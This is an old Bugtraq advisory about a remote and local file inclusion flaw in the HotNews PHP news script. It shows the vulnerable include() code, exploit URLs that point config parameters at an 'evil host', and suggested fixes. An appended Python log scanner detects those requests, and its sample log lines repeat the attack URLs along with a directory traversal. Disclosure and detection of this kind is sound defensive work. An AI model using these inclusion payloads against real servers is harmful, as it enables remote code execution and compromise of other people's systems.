Bugtraq: HotNews arbitrary file inclusion

HotNews arbitrary file inclusion

From: Dariusz 'Officerrr' Kolasinski <officerrr_at_poligon.com.pl>
Date: Sun, 4 Jan 2004 03:45:59 +0100

HotNews arbitrary file inclusion.

===+++===+++===+++
Product: HotNews
Version: <= v0.7.2
Vendor: http://sourceforge.net/projects/hotnews/
Bug discovered by: Officerrr <officerrr_at_poligon.com.pl>
Vendor Response: Not contacted yet.
===+++===+++===+++

Problem #1:
===+++===+++===+++
An attacker can include any file from a remote or local
server.

PHP Code/Location #1:
===+++===+++===+++
-- from hotnews-engine.inc.php3
[...]
/*
// Init
$pagetitle = $config["pagename"];
if (!empty($config["header"])) {
  include($config["header"]);
}
[...]

PHP Code/Location #2:
===+++===+++===+++
-- from hnmain.inc.php3
[...]
// Init
include($config["incdir"] . "hndefs.inc.php3");
include($config["incdir"] . "func.inc.php3");
include($config["incdir"] . "getopts.inc.php3");
include($config["incdir"] . "db.".$config["db_type"].".inc.php3");
if (!$config["no_fasttpl"]) {
  include($config["incdir"] . "class.FastTemplate.php3");
}
include($config["incdir"] . "class.CachedFastTemplate.php3");
[...]

Exploit:
===+++===+++===+++
http://[victim]/includes/hotnews-engine.inc.php3?config[header]=http://[evil host]/[evil file]
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://[victim]/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
etc...

Fix #1:
===+++===+++===+++
Turn off global_variables.

Fix #2:
===+++===+++===+++
Use .htaccess to protect files in the 'includes' directory.

-- 
Regards,
Dariusz 'Officerrr' Kolasinski
<Linux Administrator> <gg: 516354>
"Living on a razor's edge, Balancing on a ledge"
Received on Jan 05 2004
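Detection logic for the request pattern this advisory describes, added here as an example and not part of the original post: it scans Apache-style access-log lines for requests to the two HotNews scripts named above that carry a config[...] query parameter (the register_globals override), and classifies the value as a remote URL, a path traversal, or another config override. The log lines, IP addresses and file names used as sample data are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# HotNews scripts named in the advisory that pass $config values straight to include()
VULN_SCRIPTS = ("hotnews-engine.inc.php3", "hnmain.inc.php3")
# Apache common/combined log line; only client, request target and status are used
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)

def classify_request(target):
    """Return a finding if the request overrides $config[...] via the query string, else None."""
    # With register_globals on, any config[...] parameter lands in $config before include() runs
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in VULN_SCRIPTS:
        return None
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if not key.startswith("config["):
            continue
        for value in values:
            if SCHEME_RE.match(value):
                kind = "remote-include"   # URL handed to include(): remote file inclusion
            elif "../" in value or value.startswith("/"):
                kind = "local-traversal"  # path escaping the includes directory
            else:
                kind = "config-override"  # any other tampering with $config
            return {"script": script, "param": key, "value": value, "kind": kind}
    return None

def scan_log(lines):
    """Run classify_request over access-log lines; attach client IP and status to each finding."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and (finding := classify_request(m.group("target"))):
            finding.update(ip=m.group("ip"), status=m.group("status"))
            findings.append(finding)
    return findings

# Constructed sample log (documentation address ranges); the first three lines mirror the advisory's URLs
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jan/2004:03:45:59 +0100] "GET /includes/hotnews-engine.inc.php3?config[header]=http://198.51.100.9/evil.txt HTTP/1.0" 200 512
203.0.113.7 - - [05/Jan/2004:03:46:02 +0100] "GET /includes/hnmain.inc.php3?config%5Bincdir%5D=http%3A%2F%2F198.51.100.9%2F HTTP/1.0" 200 331
198.51.100.22 - - [05/Jan/2004:03:47:10 +0100] "GET /includes/hnmain.inc.php3?config[incdir]=../../../../etc/ HTTP/1.0" 500 0
192.0.2.5 - - [05/Jan/2004:03:48:00 +0100] "GET /index.php3?page=news HTTP/1.0" 200 4096
192.0.2.5 - - [05/Jan/2004:03:48:01 +0100] "GET /includes/hotnews-engine.inc.php3 HTTP/1.0" 200 2048
"""
```

Calling `scan_log(SAMPLE_LOG.splitlines())` returns three findings (two remote-include, one local-traversal); a 200 status on a remote-include hit is the case to escalate, since it means the remote file was fetched and executed.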